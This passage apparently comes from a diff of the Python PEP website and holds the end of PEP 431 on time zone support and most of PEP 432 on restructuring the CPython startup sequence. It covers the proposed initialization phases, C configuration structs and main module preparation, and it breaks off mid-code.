New exceptions

+
  • UnknownTimeZoneError

    This exception is a subclass of KeyError and is raised when giving a time zone specification that can’t be found:

    >>> datetime.zoneinfo('Europe/New_York')
    Traceback (most recent call last):
    ...
    UnknownTimeZoneError: There is no time zone called 'Europe/New_York'

  • InvalidTimeError

    This exception serves as a base for AmbiguousTimeError and NonExistentTimeError, to enable you to trap these two separately. It will subclass from ValueError, so that you can catch these errors together with other errors raised for invalid inputs, like the 29th of February 2011 (see the sketch after this list).

  • AmbiguousTimeError

    This exception is raised when giving a datetime specification that is ambiguous while setting is_dst to None:

    >>> datetime(2012, 10, 28, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'), is_dst=None)
    Traceback (most recent call last):
    ...
    AmbiguousTimeError: 2012-10-28 02:00:00 is ambiguous in time zone Europe/Stockholm

  • NonExistentTimeError

    This exception is raised when giving a datetime specification for a time that, due to daylight saving, does not exist, while setting is_dst to None:

    >>> datetime(2012, 3, 25, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'), is_dst=None)
    Traceback (most recent call last):
    ...
    NonExistentTimeError: 2012-03-25 02:00:00 does not exist in time zone Europe/Stockholm
+
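For instance, trapping both kinds of invalid time in one handler might look like this (a hypothetical sketch against the proposed, never-implemented API):

>>> try:
...     datetime(2012, 3, 25, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'), is_dst=None)
... except InvalidTimeError as e:
...     print('Invalid input:', e)
...
Invalid input: 2012-03-25 02:00:00 does not exist in time zone Europe/Stockholm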
+
+

New collections

+
  • all_timezones is the exhaustive list of the time zone names that can be used, listed alphabetically.
  • common_timezones is a list of useful, current time zones, listed alphabetically.
+
+
+

The tzdata-update-package

+

The zoneinfo database will be packaged for easy installation with +easy_install/pip/buildout. This package will not install any +Python code, and will not contain any Python code except that which is needed +for installation.

+

It will be kept updated with the same tools as the internal database, but released whenever the zoneinfo database is updated, and it will use the same version scheme.

+
+
+
+

Differences from the pytz API

+
  • pytz has the functions localize() and normalize() to work around the fact that tzinfo doesn’t have is_dst. When is_dst is implemented directly in datetime.tzinfo they are no longer needed.
  • The timezone() function is called zoneinfo() to avoid clashing with the timezone class introduced in Python 3.2.
  • zoneinfo() will return the local time zone if called without arguments.
  • The class pytz.StaticTzInfo is there to provide the is_dst support for static time zones. When is_dst support is included in datetime.tzinfo it is no longer needed.
  • InvalidTimeError subclasses from ValueError.
+
+

Resources

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0431.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0432/index.html new file mode 100644 index 00000000000..cd96ca807a7 --- /dev/null +++ b/pep-0432/index.html @@ -0,0 +1,1460 @@ PEP 432 – Restructuring the CPython startup sequence | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 432 – Restructuring the CPython startup sequence

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Victor Stinner <vstinner at python.org>, +Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Capi-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Requires:
+
587
+
Created:
+
28-Dec-2012
+
Post-History:
+
28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

From late 2012 to mid 2020, this PEP provided general background and specific +concrete proposals for making the CPython startup sequence easier to maintain +and the CPython runtime easier to embed as part of a larger application.

+

For most of that time, the changes were maintained either in a separate feature +branch, or else as underscore-prefixed private APIs in the main CPython repo.

+

In 2019, PEP 587 migrated a subset of those API changes to the public CPython +API for Python 3.8+ (specifically, the PEP updated the interpreter runtime to +offer an explicitly multi-stage struct-based configuration interface).

+

In June 2020, in response to a query from the Steering Council, the PEP authors +decided that it made sense to withdraw the original PEP, as enough has changed +since PEP 432 was first written that we think any further changes to the +startup sequence and embedding API would be best formulated as a new PEP (or +PEPs) that take into account not only the not-yet-implemented ideas from PEP 432 +that weren’t considered sufficiently well validated to make their way into +PEP 587, but also any feedback on the public PEP 587 API, and any other lessons +that have been learned while adjusting the CPython implementation to be more +embedding and subinterpreter friendly.

+

In particular, PEPs proposing the following changes, and any further +infrastructure changes needed to enable them, would likely still be worth +exploring:

+
  • shipping an alternate Python executable that ignores all user level settings and runs in isolated mode by default, and would hence be more suitable for execution of system level Python applications than the default interpreter
  • enhancing the zipapp module to support the creation of single-file executables from pure Python scripts (and potentially even Python extension modules, given the introduction of multi-phase extension module initialisation)
  • migrating the complex sys.path initialisation logic from C to Python in order to improve test suite coverage and the general maintainability of that code
+
+

Abstract

+

This PEP proposes a mechanism for restructuring the startup sequence for +CPython, making it easier to modify the initialization behaviour of the +reference interpreter executable, as well as making it easier to control +CPython’s startup behaviour when creating an alternate executable or +embedding it as a Python execution engine inside a larger application.

+

When implementation of this proposal is completed, interpreter startup will +consist of three clearly distinct and independently configurable phases:

+
  • Python core runtime preinitialization
      • setting up memory management
      • determining the encodings used for system interfaces (including settings passed in for later configuration phases)
  • Python core runtime initialization
      • ensuring the C API is ready for use
      • ensuring builtin and frozen modules are accessible
  • Main interpreter configuration
      • ensuring external modules are accessible
      • (Note: the name of this phase is quite likely to change)

Changes are also proposed that impact main module execution and subinterpreter +initialization.

+

Note: TBC = To Be Confirmed, TBD = To Be Determined. The appropriate +resolution for most of these should become clearer as the reference +implementation is developed.

+
+
+

Proposal

+

This PEP proposes that initialization of the CPython runtime be split into +three clearly distinct phases:

+
  • core runtime preinitialization
  • core runtime initialization
  • main interpreter configuration

(Earlier versions proposed only two phases, but experience with attempting to +implement the PEP as an internal CPython refactoring showed that at least 3 +phases are needed to get clear separation of concerns)

+

The proposed design also has significant implications for:

+
  • main module execution
  • subinterpreter initialization

In the new design, the interpreter will move through the following +well-defined phases during the initialization sequence:

+
  • Uninitialized - haven’t even started the pre-initialization phase yet
  • Pre-Initialization - no interpreter available
  • Runtime Initialized - main interpreter partially available, subinterpreter creation not yet available
  • Initialized - main interpreter fully available, subinterpreter creation available

PEP 587 is a more detailed proposal that covers separating out the +Pre-Initialization phase from the last two phases, but doesn’t allow embedding +applications to run arbitrary code while in the “Runtime Initialized” state +(instead, initializing the core runtime will also always fully initialize the +main interpreter, as that’s the way the native CPython CLI still works in +Python 3.8).

+

As a concrete use case to help guide any design changes, and to solve a known +problem where the appropriate defaults for system utilities differ from those +for running user scripts, this PEP proposes the creation and +distribution of a separate system Python (system-python) executable +which, by default, operates in “isolated mode” (as selected by the CPython +-I switch), as well as the creation of an example stub binary that just +runs an appended zip archive (permitting single-file pure Python executables) +rather than going through the normal CPython startup sequence.

+

To keep the implementation complexity under control, this PEP does not +propose wholesale changes to the way the interpreter state is accessed at +runtime. Changing the order in which the existing initialization steps +occur in order to make the startup sequence easier to maintain is already a +substantial change, and attempting to make those other changes at the same time +will make the change significantly more invasive and much harder to review. +However, such proposals may be suitable topics for follow-on PEPs or patches +- one key benefit of this PEP and its related subproposals is decreasing the +coupling between the internal storage model and the configuration interface, +so such changes should be easier once this PEP has been implemented.

+
+
+

Background

+

Over time, CPython’s initialization sequence has become progressively more +complicated, offering more options, as well as performing more complex tasks +(such as configuring the Unicode settings for OS interfaces in Python 3 [10], +bootstrapping a pure Python implementation of the import system, and +implementing an isolated mode more suitable for system applications that run +with elevated privileges [6]).

+

Much of this complexity is formally accessible only through the Py_Main +and Py_Initialize APIs, offering embedding applications little +opportunity for customisation. This creeping complexity also makes life +difficult for maintainers, as much of the configuration needs to take +place prior to the Py_Initialize call, meaning much of the Python C +API cannot be used safely.

+

A number of proposals are on the table for even more sophisticated startup behaviour, such as better control over sys.path initialization (e.g. easily adding additional directories on the command line in a cross-platform fashion [7], or controlling the configuration of sys.path[0] [8]), and easier configuration of utilities like coverage tracing when launching Python subprocesses [9].

+

Rather than continuing to bolt such behaviour onto an already complicated +system indefinitely, this PEP proposes to start simplifying the status quo by +introducing a more structured startup sequence, with the aim of making these +further feature requests easier to implement.

+

Originally the entire proposal was maintained in this one PEP, but that proved +impractical, so as parts of the proposed design stabilised, they are now split +out into their own PEPs, allowing progress to be made, even while the details +of the overall design are still evolving.

+
+
+

Key Concerns

+

There are a few key concerns that any change to the startup sequence +needs to take into account.

+
+

Maintainability

+

The CPython startup sequence as of Python 3.6 was difficult to understand, and +even more difficult to modify. It was not clear what state the interpreter was +in while much of the initialization code executed, leading to behaviour such +as lists, dictionaries and Unicode values being created prior to the call +to Py_Initialize when the -X or -W options are used [1].

+

By moving to an explicitly multi-phase startup sequence, developers should +only need to understand:

+
  • which APIs and features are available prior to pre-configuration (essentially none, except for the pre-configuration API itself)
  • which APIs and features are available prior to core runtime configuration, and will implicitly run the pre-configuration with default settings that match the behaviour of Python 3.6 if the pre-configuration hasn’t been run explicitly
  • which APIs and features are only available after the main interpreter has been fully configured (which will hopefully be a relatively small subset of the full C API)

The first two aspects of that are covered by PEP 587, while the details of the +latter distinction are still being considered.

+

By basing the new design on a combination of C structures and Python +data types, it should also be easier to modify the system in the +future to add new configuration options.

+
+
+

Testability

+

One of the problems with the complexity of the CPython startup sequence is the +combinatorial explosion of possible interactions between different configuration +settings.

+

This concern impacts both the design of the new initialisation system, and +the proposed approach for getting there.

+
+
+

Performance

+

CPython is used heavily to run short scripts where the runtime is dominated +by the interpreter initialization time. Any changes to the startup sequence +should minimise their impact on the startup overhead.

+

Experience with the importlib migration suggests that the startup time is +dominated by IO operations. However, to monitor the impact of any changes, +a simple benchmark can be used to check how long it takes to start and then +tear down the interpreter:

+
python3 -m timeit -s "from subprocess import call" "call(['./python', '-Sc', 'pass'])"
+
+
+

Current numbers on my system for Python 3.7 (as built by the Fedora project):

+
$ python3 -m timeit -s "from subprocess import call" "call(['python3', '-Sc', 'pass'])"
+50 loops, best of 5: 6.48 msec per loop
+
+
+

(TODO: run this microbenchmark with perf rather than the stdlib timeit)

+

This PEP is not expected to have any significant effect on the startup time, +as it is aimed primarily at reordering the existing initialization +sequence, without making substantial changes to the individual steps.

+

However, if this simple check suggests that the proposed changes to the +initialization sequence may pose a performance problem, then a more +sophisticated microbenchmark will be developed to assist in investigation.

+
+
+
+

Required Configuration Settings

+

See PEP 587 for a detailed listing of CPython interpreter configuration settings +and the various means available for setting them.

+
+
+

Implementation Strategy

+

An initial attempt was made at implementing an earlier version of this PEP for +Python 3.4 [2], with one of the significant problems encountered being merge +conflicts after the initial structural changes were put in place to start the +refactoring process. Unlike some other previous major changes, such as the +switch to an AST-based compiler in Python 2.5, or the switch to the importlib +implementation of the import system in Python 3.3, there is no clear way to +structure a draft implementation that won’t be prone to the kinds of merge +conflicts that afflicted the original attempt.

+

Accordingly, the implementation strategy was revised to instead first implement +this refactoring as a private API for CPython 3.7, and then review the viability +of exposing the new functions and structures as public API elements in CPython +3.8.

+

After the initial merge, Victor Stinner then proceeded to actually migrate +settings to the new structure in order to successfully implement the PEP 540 +UTF-8 mode changes (which required the ability to track all settings that had +previously been decoded with the locale encoding, and decode them again using +UTF-8 instead). Eric Snow also migrated a number of internal subsystems over as +part of making the subinterpreter feature more robust.

+

That work showed that the detailed design originally proposed in this PEP had a +range of practical issues, so Victor designed and implemented an improved +private API (inspired by an earlier iteration of this PEP), which PEP 587 +proposes to promote to a public API in Python 3.8.

+
+
+

Design Details

+
+

Note

+

The API details here are still very much in flux. The header files that show +the current state of the private API are mainly:

+ +

PEP 587 covers the aspects of the API that are considered potentially stable +enough to make public. Where a proposed API is covered by that PEP, +“(see PEP 587)” is added to the text below.

+
+

The main theme of this proposal is to initialize the core language runtime +and create a partially initialized interpreter state for the main interpreter +much earlier in the startup process. This will allow most of the CPython API +to be used during the remainder of the initialization process, potentially +simplifying a number of operations that currently need to rely on basic C +functionality rather than being able to use the richer data structures provided +by the CPython C API.

+

PEP 587 covers a subset of that task, which is splitting out the components that +even the existing “May be called before Py_Initialize” interfaces need (like +memory allocators and operating system interface encoding details) into a +separate pre-configuration step.

+

In the following, the term “embedding application” also covers the standard +CPython command line application.

+
+

Interpreter Initialization Phases

+

The following distinct interpreter initialisation phases are proposed:

+
  • Uninitialized:
      • Not really a phase, but the absence of a phase
      • Py_IsInitializing() returns 0
      • Py_IsRuntimeInitialized() returns 0
      • Py_IsInitialized() returns 0
      • The embedding application determines which memory allocator to use, and which encoding to use to access operating system interfaces (or chooses to delegate those decisions to the Python runtime)
      • Application starts the initialization process by calling one of the Py_PreInitialize APIs (see PEP 587)
  • Runtime Pre-Initialization:
      • no interpreter is available
      • Py_IsInitializing() returns 1
      • Py_IsRuntimeInitialized() returns 0
      • Py_IsInitialized() returns 0
      • The embedding application determines the settings required to initialize the core CPython runtime and create the main interpreter, and moves to the next phase by calling Py_InitializeRuntime
      • Note: as of PEP 587, the embedding application instead calls Py_Main(), Py_UnixMain, or one of the Py_Initialize APIs, and hence jumps directly to the Initialized state.
  • Main Interpreter Initialization:
      • the builtin data types and other core runtime services are available
      • the main interpreter is available, but only partially configured
      • Py_IsInitializing() returns 1
      • Py_IsRuntimeInitialized() returns 1
      • Py_IsInitialized() returns 0
      • The embedding application determines and applies the settings required to complete the initialization process by calling Py_InitializeMainInterpreter
      • Note: as of PEP 587, this state is not reachable via any public API, it only exists as an implicit internal state while one of the Py_Initialize functions is running
  • Initialized:
      • the main interpreter is available and fully operational, but __main__ related metadata is incomplete
      • Py_IsInitializing() returns 0
      • Py_IsRuntimeInitialized() returns 1
      • Py_IsInitialized() returns 1
+
+

Invocation of Phases

+

All listed phases will be used by the standard CPython interpreter and the +proposed System Python interpreter.

+

An embedding application may still continue to leave initialization almost +entirely under CPython’s control by using the existing Py_Initialize +or Py_Main() APIs - backwards compatibility will be preserved.

+

Alternatively, if an embedding application wants greater control +over CPython’s initial state, it will be able to use the new, finer +grained API, which allows the embedding application greater control +over the initialization process.

+

PEP 587 covers an initial iteration of that API, separating out the +pre-initialization phase without attempting to separate core runtime +initialization from main interpreter initialization.

+
+
+

Uninitialized State

+

The uninitialized state is where an embedding application determines the settings which are required in order to be able to correctly pass configuration settings to the embedded Python runtime.

+

This covers telling Python which memory allocator to use, as well as which text +encoding to use when processing provided settings.

+

PEP 587 defines the settings needed to exit this state in its PyPreConfig +struct.

+

A new query API will allow code to determine if the interpreter hasn’t even +started the initialization process:

+
int Py_IsInitializing();
+
+
+

The query for a completely uninitialized environment would then be !(Py_IsInitialized() || Py_IsInitializing()).

+
+
+

Runtime Pre-Initialization Phase

+
+

Note

+

In PEP 587, the settings for this phase are not yet separated out, +and are instead only available through the combined PyConfig struct

+
+

The pre-initialization phase is where an embedding application determines +the settings which are absolutely required before the CPython runtime can be +initialized at all. Currently, the primary configuration settings in this +category are those related to the randomised hash algorithm - the hash +algorithms must be consistent for the lifetime of the process, and so they +must be in place before the core interpreter is created.

+

The essential settings needed are a flag indicating whether or not to use a +specific seed value for the randomised hashes, and if so, the specific value +for the seed (a seed value of zero disables randomised hashing). In addition, +due to the possible use of PYTHONHASHSEED in configuring the hash +randomisation, the question of whether or not to consider environment +variables must also be addressed early. Finally, to support the CPython +build process, an option is offered to completely disable the import +system.

+

The proposed APIs for this step in the startup sequence are:

+
PyInitError Py_InitializeRuntime(
+    const PyRuntimeConfig *config
+);
+
+PyInitError Py_InitializeRuntimeFromArgs(
+    const PyRuntimeConfig *config, int argc, char **argv
+);
+
+PyInitError Py_InitializeRuntimeFromWideArgs(
+    const PyRuntimeConfig *config, int argc, wchar_t **argv
+);
+
+
+

If Py_IsInitializing() is false, the Py_InitializeRuntime functions will +implicitly call the corresponding Py_PreInitialize function. The +use_environment setting will be passed down, while other settings will be +processed according to their defaults, as described in PEP 587.

+

The PyInitError return type is defined in PEP 587, and allows an embedding +application to gracefully handle Python runtime initialization failures, +rather than having the entire process abruptly terminated by Py_FatalError.

+

The new PyRuntimeConfig struct holds the settings required for preliminary +configuration of the core runtime and creation of the main interpreter:

+
/* Note: if changing anything in PyRuntimeConfig, also update
+ * PyRuntimeConfig_INIT */
+typedef struct {
+    bool use_environment;     /* as in PyPreConfig, PyConfig from PEP 587 */
+    int use_hash_seed;        /* PYTHONHASHSEED, as in PyConfig from PEP 587 */
+    unsigned long hash_seed;  /* PYTHONHASHSEED, as in PyConfig from PEP 587 */
+    bool _install_importlib;  /* Needed by freeze_importlib */
+} PyRuntimeConfig;
+
+/* Rely on the "designated initializer" feature of C99 */
+#define PyRuntimeConfig_INIT {.use_hash_seed=-1}
+
+
+

The core configuration settings pointer may be NULL, in which case the +default values are as specified in PyRuntimeConfig_INIT.

+

The PyRuntimeConfig_INIT macro is designed to allow easy initialization +of a struct instance with sensible defaults:

+
PyRuntimeConfig runtime_config = PyRuntimeConfig_INIT;
+
+
+

use_environment controls the processing of all Python related +environment variables. If the flag is true, then PYTHONHASHSEED is +processed normally. Otherwise, all Python-specific environment variables +are considered undefined (exceptions may be made for some OS specific +environment variables, such as those used on Mac OS X to communicate +between the App bundle and the main Python binary).

+

use_hash_seed controls the configuration of the randomised hash algorithm. If it is zero, then randomised hashes with a random seed will be used. If it is positive, then the value in hash_seed will be used to seed the random number generator. If hash_seed is zero in this case, then randomised hashing is disabled completely.

+

If use_hash_seed is negative (and use_environment is true), +then CPython will inspect the PYTHONHASHSEED environment variable. If the +environment variable is not set, is set to the empty string, or to the value +"random", then randomised hashes with a random seed will be used. If the +environment variable is set to the string "0" the randomised hashing will +be disabled. Otherwise, the hash seed is expected to be a string +representation of an integer in the range [0; 4294967295].

+

To make it easier for embedding applications to use the PYTHONHASHSEED +processing with a different data source, the following helper function +will be added to the C API:

+
int Py_ReadHashSeed(char *seed_text,
+                    int *use_hash_seed,
+                    unsigned long *hash_seed);
+
+
+

This function accepts a seed string in seed_text and converts it to +the appropriate flag and seed values. If seed_text is NULL, +the empty string or the value "random", both use_hash_seed and +hash_seed will be set to zero. Otherwise, use_hash_seed will be set to +1 and the seed text will be interpreted as an integer and reported as +hash_seed. On success the function will return zero. A non-zero return +value indicates an error (most likely in the conversion to an integer).
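As a rough cross-check of those parsing rules, a hypothetical pure-Python rendering of the same logic might look like this (illustrative only; the proposal itself specifies the C helper above, and the function name here is invented):

def read_hash_seed(seed_text):
    """Return (use_hash_seed, hash_seed) following the PYTHONHASHSEED rules."""
    if seed_text is None or seed_text in ('', 'random'):
        return 0, 0  # randomised hashing with a random seed
    seed = int(seed_text)  # a bad value is an error, as in Py_ReadHashSeed
    if not 0 <= seed <= 4294967295:
        raise ValueError('hash seed must be in the range [0; 4294967295]')
    return 1, seed  # note: a seed of 0 disables randomised hashing entirely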

+

The _install_importlib setting is used as part of the CPython build +process to create an interpreter with no import capability at all. It is +considered private to the CPython development team (hence the leading +underscore), as the only currently supported use case is to permit compiler +changes that invalidate the previously frozen bytecode for +importlib._bootstrap without breaking the build process.

+

The aim is to keep this initial level of configuration as small as possible +in order to keep the bootstrapping environment consistent across +different embedding applications. If we can create a valid interpreter state +without the setting, then the setting should appear solely in the comprehensive +PyConfig struct rather than in the core runtime configuration.

+

A new query API will allow code to determine if the interpreter is in the +bootstrapping state between the core runtime initialization and the creation of +the main interpreter state and the completion of the bulk of the main +interpreter initialization process:

+
int Py_IsRuntimeInitialized();
+
+
+

Attempting to call Py_InitializeRuntime() again when +Py_IsRuntimeInitialized() is already true is reported as a user +configuration error. (TBC, as existing public initialisation APIs support being +called multiple times without error, and simply ignore changes to any +write-once settings. It may make sense to keep that behaviour rather than trying +to make the new API stricter than the old one)

+

As frozen bytecode may now be legitimately run in an interpreter which is not +yet fully initialized, sys.flags will gain a new initialized flag.

+

With the core runtime initialised, the main interpreter and most of the CPython +C API should be fully functional except that:

+
  • compilation is not allowed (as the parser and compiler are not yet configured properly)
  • creation of subinterpreters is not allowed
  • creation of additional thread states is not allowed
  • The following attributes in the sys module are all either missing or None:
      • sys.path
      • sys.argv
      • sys.executable
      • sys.base_exec_prefix
      • sys.base_prefix
      • sys.exec_prefix
      • sys.prefix
      • sys.warnoptions
      • sys.dont_write_bytecode
      • sys.stdin
      • sys.stdout
  • The filesystem encoding is not yet defined
  • The IO encoding is not yet defined
  • CPython signal handlers are not yet installed
  • Only builtin and frozen modules may be imported (due to above limitations)
  • sys.stderr is set to a temporary IO object using unbuffered binary mode
  • The sys.flags attribute exists, but the individual flags may not yet have their final values.
  • The sys.flags.initialized attribute is set to 0
  • The warnings module is not yet initialized
  • The __main__ module does not yet exist

<TBD: identify any other notable missing functionality>

+

The main things made available by this step will be the core Python +data types, in particular dictionaries, lists and strings. This allows them +to be used safely for all of the remaining configuration steps (unlike the +status quo).

+

In addition, the current thread will possess a valid Python thread state, +allowing any further configuration data to be stored on the main interpreter +object rather than in C process globals.

+

Any call to Py_InitializeRuntime() must have a matching call to +Py_Finalize(). It is acceptable to skip calling +Py_InitializeMainInterpreter() in between (e.g. if attempting to build the +main interpreter configuration settings fails).

+
+
+

Determining the remaining configuration settings

+

The next step in the initialization sequence is to determine the remaining +settings needed to complete the process. No changes are made to the +interpreter state at this point. The core APIs for this step are:

+
int Py_BuildPythonConfig(
+    PyConfigAsObjects *py_config, const PyConfig *c_config
+);
+
+int Py_BuildPythonConfigFromArgs(
+    PyConfigAsObjects *py_config, const PyConfig *c_config, int argc, char **argv
+);
+
+int Py_BuildPythonConfigFromWideArgs(
+    PyConfigAsObjects *py_config, const PyConfig *c_config, int argc, wchar_t **argv
+);
+
+
+

The py_config argument should be a pointer to a PyConfigAsObjects struct +(which may be a temporary one stored on the C stack). For any already configured +value (i.e. any non-NULL pointer), CPython will sanity check the supplied value, +but otherwise accept it as correct.

+

A struct is used rather than a Python dictionary as the struct is easier +to work with from C, the list of supported fields is fixed for a given +CPython version and only a read-only view needs to be exposed to Python +code (which is relatively straightforward, thanks to the infrastructure +already put in place to expose sys.implementation).

+

Unlike Py_InitializeRuntime, this call will raise a Python exception and +report an error return rather than returning a Python initialization specific +C struct if a problem is found with the config data.

+

Any supported configuration setting which is not already set will be +populated appropriately in the supplied configuration struct. The default +configuration can be overridden entirely by setting the value before +calling Py_BuildPythonConfig. The provided value will then also be +used in calculating any other settings derived from that value.

+

Alternatively, settings may be overridden after the +Py_BuildPythonConfig call (this can be useful if an embedding +application wants to adjust a setting rather than replace it completely, +such as removing sys.path[0]).

+

The c_config argument is an optional pointer to a PyConfig structure, +as defined in PEP 587. If provided, it is used in preference to reading settings +directly from the environment or process global state.

+

Merely reading the configuration has no effect on the interpreter state: it +only modifies the passed in configuration struct. The settings are not +applied to the running interpreter until the Py_InitializeMainInterpreter +call (see below).

+
+
+

Supported configuration settings

+

The interpreter configuration is split into two parts: settings which are +either relevant only to the main interpreter or must be identical across the +main interpreter and all subinterpreters, and settings which may vary across +subinterpreters.

+

NOTE: For initial implementation purposes, only the flag indicating whether +or not the interpreter is the main interpreter will be configured on a per +interpreter basis. Other fields will be reviewed for whether or not they can +feasibly be made interpreter specific over the course of the implementation.

+
+

Note

+

The list of config fields below is currently out of sync with PEP 587. +Where they differ, PEP 587 takes precedence.

+
+

The PyConfigAsObjects struct mirrors the PyConfig struct from PEP 587, +but uses full Python objects to store values, rather than C level data types. +It adds raw_argv and argv list fields, so later initialisation steps +don’t need to accept those separately.

+

Fields are always pointers to Python data types, with unset values indicated by +NULL:

+
typedef struct {
+    /* Argument processing */
+    PyListObject *raw_argv;
+    PyListObject *argv;
+    PyListObject *warnoptions; /* -W switch, PYTHONWARNINGS */
+    PyDictObject *xoptions;    /* -X switch */
+
+    /* Filesystem locations */
+    PyUnicodeObject *program_name;
+    PyUnicodeObject *executable;
+    PyUnicodeObject *prefix;           /* PYTHONHOME */
+    PyUnicodeObject *exec_prefix;      /* PYTHONHOME */
+    PyUnicodeObject *base_prefix;      /* pyvenv.cfg */
+    PyUnicodeObject *base_exec_prefix; /* pyvenv.cfg */
+
+    /* Site module */
+    PyBoolObject *enable_site_config;  /* -S switch (inverted) */
+    PyBoolObject *no_user_site;        /* -s switch, PYTHONNOUSERSITE */
+
+    /* Import configuration */
+    PyBoolObject *dont_write_bytecode; /* -B switch, PYTHONDONTWRITEBYTECODE */
+    PyBoolObject *ignore_module_case;  /* PYTHONCASEOK */
+    PyListObject *import_path;        /* PYTHONPATH (etc) */
+
+    /* Standard streams */
+    PyBoolObject    *use_unbuffered_io; /* -u switch, PYTHONUNBUFFEREDIO */
+    PyUnicodeObject *stdin_encoding;    /* PYTHONIOENCODING */
+    PyUnicodeObject *stdin_errors;      /* PYTHONIOENCODING */
+    PyUnicodeObject *stdout_encoding;   /* PYTHONIOENCODING */
+    PyUnicodeObject *stdout_errors;     /* PYTHONIOENCODING */
+    PyUnicodeObject *stderr_encoding;   /* PYTHONIOENCODING */
+    PyUnicodeObject *stderr_errors;     /* PYTHONIOENCODING */
+
+    /* Filesystem access */
+    PyUnicodeObject *fs_encoding;
+
+    /* Debugging output */
+    PyBoolObject *debug_parser;    /* -d switch, PYTHONDEBUG */
+    PyLongObject *verbosity;       /* -v switch */
+
+    /* Code generation */
+    PyLongObject *bytes_warnings;  /* -b switch */
+    PyLongObject *optimize;        /* -O switch */
+
+    /* Signal handling */
+    PyBoolObject *install_signal_handlers;
+
+    /* Implicit execution */
+    PyUnicodeObject *startup_file;  /* PYTHONSTARTUP */
+
+    /* Main module
+     *
+     * If prepare_main is set, at most one of the main_* settings should
+     * be set before calling PyRun_PrepareMain (Py_ReadMainInterpreterConfig
+     * will set one of them based on the command line arguments if
+     * prepare_main is non-zero when that API is called).
+     */
+    PyBoolObject    *prepare_main;
+    PyUnicodeObject *main_source; /* -c switch */
+    PyUnicodeObject *main_path;   /* filesystem path */
+    PyUnicodeObject *main_module; /* -m switch */
+    PyCodeObject    *main_code;   /* Run directly from a code object */
+    PyObject        *main_stream; /* Run from stream */
+    PyBoolObject    *run_implicit_code; /* Run implicit code during prep */
+
+    /* Interactive main
+     *
+     * Note: Settings related to interactive mode are very much in flux.
+     */
+    PyObject *prompt_stream;      /* Output interactive prompt */
+    PyBoolObject *show_banner;    /* -q switch (inverted) */
+    PyBoolObject *inspect_main;   /* -i switch, PYTHONINSPECT */
+
+} PyConfigAsObjects;
+
+
+

The PyInterpreterConfig struct holds the settings that may vary between the main interpreter and subinterpreters. For the main interpreter, these settings are automatically populated by Py_InitializeMainInterpreter().

+
typedef struct {
+    PyBoolObject *is_main_interpreter;    /* Easily check for subinterpreters */
+} PyInterpreterConfig;
+
+
+

As these structs consist solely of object pointers, no explicit initializer definitions are needed - C99's default initialization of struct memory to zero is sufficient.

+
+
+

Completing the main interpreter initialization

+

The final step in the initialization process is to actually put the configuration settings into effect and finish bootstrapping the main interpreter up to full operation:

+
int Py_InitializeMainInterpreter(const PyConfigAsObjects *config);
+
+
+

Like Py_BuildPythonConfig, this call will raise an exception and report an error return rather than exhibiting fatal errors if a problem is found with the config data. (TBC, as existing public initialisation APIs support being called multiple times without error, and simply ignore changes to any write-once settings. It may make sense to keep that behaviour rather than trying to make the new API stricter than the old one.)

All configuration settings are required - the configuration struct should always be passed through Py_BuildPythonConfig to ensure it is fully populated.

After a successful call Py_IsInitialized() will become true and Py_IsInitializing() will become false. The caveats described above for the interpreter during the phase where only the core runtime is initialized will no longer hold.

Attempting to call Py_InitializeMainInterpreter() again when Py_IsInitialized() is true is an error.

However, some metadata related to the __main__ module may still be incomplete:

+
• sys.argv[0] may not yet have its final value:
    • it will be -m when executing a module or package with CPython
    • it will be the same as sys.path[0] rather than the location of the __main__ module when executing a valid sys.path entry (typically a zipfile or directory)
    • otherwise, it will be accurate:
        • the script name if running an ordinary script
        • -c if executing a supplied string
        • - or the empty string if running from stdin
• the metadata in the __main__ module will still indicate it is a builtin module

This function will normally implicitly import site as its final operation (after Py_IsInitialized() is already set). Setting the "enable_site_config" flag to Py_False in the configuration settings will disable this behaviour, as well as eliminating any side effects on global state if import site is later explicitly executed in the process.

+
+
+

Preparing the main module

+
+

Note

+

In PEP 587, PyRun_PrepareMain and PyRun_ExecMain are not exposed separately, and are instead accessed through a Py_RunMain API that both prepares and executes main, and then finalizes the Python interpreter.

This subphase completes the population of the __main__ module related metadata, without actually starting execution of the __main__ module code.

It is handled by calling the following API:

+
int PyRun_PrepareMain();
+
+
+

This operation is only permitted for the main interpreter, and will raise RuntimeError when invoked from a thread where the current thread state belongs to a subinterpreter.

The actual processing is driven by the main related settings stored in the interpreter state as part of the configuration struct.

If prepare_main is zero, this call does nothing.

If all of main_source, main_path, main_module, main_stream and main_code are NULL, this call does nothing.

If more than one of main_source, main_path, main_module, main_stream or main_code are set, RuntimeError will be reported.

If main_code is already set, then this call does nothing.

If main_stream is set, and run_implicit_code is also set, then the file identified in startup_file will be read, compiled and executed in the __main__ namespace.

If main_source, main_path or main_module are set, then this call will take whatever steps are needed to populate main_code:

+
• For main_source, the supplied string will be compiled and saved to main_code.
• For main_path:
    • if the supplied path is recognised as a valid sys.path entry, it is inserted as sys.path[0], main_module is set to __main__ and processing continues as for main_module below
    • otherwise, the path is read as a CPython bytecode file
    • if that fails, it is read as a Python source file and compiled
    • in the latter two cases, the code object is saved to main_code and __main__.__file__ is set appropriately
• For main_module (a rough Python-level sketch of this lookup follows the note below):
    • any parent package is imported
    • the loader for the module is determined
    • if the loader indicates the module is a package, add .__main__ to the end of main_module and try again (if the final name segment is already .__main__ then fail immediately)
    • once the module source code is located, save the compiled module code as main_code and populate the following attributes in __main__ appropriately: __name__, __loader__, __file__, __cached__, __package__

(Note: the behaviour described in this section isn't new, it's a write-up of the current behaviour of the CPython interpreter adjusted for the new configuration system.)
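As a concrete illustration of the main_module steps, here is a rough Python-level sketch using importlib (illustrative only: resolve_main_module is a hypothetical helper name, and the real logic lives in C and in the runpy module):

import importlib.util

def resolve_main_module(name):
    # find_spec() imports any parent package as a side effect
    spec = importlib.util.find_spec(name)
    if spec is None:
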